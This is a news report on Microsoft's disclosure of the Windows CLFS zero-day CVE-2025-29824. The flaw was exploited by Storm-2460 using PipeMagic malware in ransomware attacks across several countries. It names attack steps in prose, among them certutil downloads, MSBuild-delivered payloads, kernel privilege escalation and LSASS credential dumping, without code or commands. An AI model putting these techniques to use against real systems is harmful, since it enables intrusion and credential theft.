Microsoft has disclosed that a recently patched security vulnerability within the Windows Common Log File System (CLFS) was actively exploited as a zero-day in targeted ransomware attacks against several entities. This flaw, identified as CVE-2025-29824, was employed to escalate privileges, thus granting attackers SYSTEM-level access.
The affected organizations span multiple sectors, including information technology and real estate in the United States, the financial sector in Venezuela, a software company in Spain, and retail businesses in Saudi Arabia. Microsoft has documented these attacks and is monitoring them under the threat actor designation Storm-2460, which is leveraging a malware named PipeMagic to execute these exploits alongside ransomware payloads.
The specific mechanisms of initial access remain unclear; however, observations indicate that attackers utilized the certutil utility to download malicious files from a compromised third-party resource. The malware, delivered as an MSBuild file, contains an encrypted payload intended to extract the malicious PipeMagic trojan, which has been active in the wild since 2022.
CVE-2025-29824 marks the second zero-day vulnerability exploited through PipeMagic; the previous incident involved CVE-2025-24983, a privilege escalation vulnerability, which Microsoft patched shortly before the current outbreak. Moreover, earlier iterations of PipeMagic were linked to Nokoyawa ransomware operations, which had similarly exploited another CLFS zero-day vulnerability.
Insights from Kaspersky reveal that, prior to exploiting the CLFS vulnerability, machines targeted by these actors were often compromised with a modular backdoor named ‘PipeMagic’ that is initiated via MSBuild scripts. Importantly, it has been confirmed that Windows 11, version 24H2, is not vulnerable to this specific threat, as access to essential System Information Classes within the operating system is restricted to users with elevated privileges.
The Microsoft Threat Intelligence team elucidated the exploit’s mechanics, emphasizing that it targets a vulnerability in the CLFS kernel driver, leading to memory corruption and unauthorized privilege escalation through the RtlSetAllBits API. This allows the exploit process to gain all privileges, essentially facilitating process injection into SYSTEM processes.
Upon successful exploitation, attackers can extract user credentials by dumping the Local Security Authority Subsystem Service (LSASS) memory and initiating file encryption with arbitrary extensions. Although Microsoft did not acquire a ransomware sample for analysis, they noted that the ransom note found post-attack included a TOR domain linked to the RansomEXX ransomware group.
The tactical nuances of this incident demonstrate that ransomware actors value elevation of privilege exploits due to their capacity to facilitate a transition from initial access—often obtained through commodity malware—into higher, privileged access. This escalation is then utilized for broader deployment and execution of ransomware payloads across affected networks.
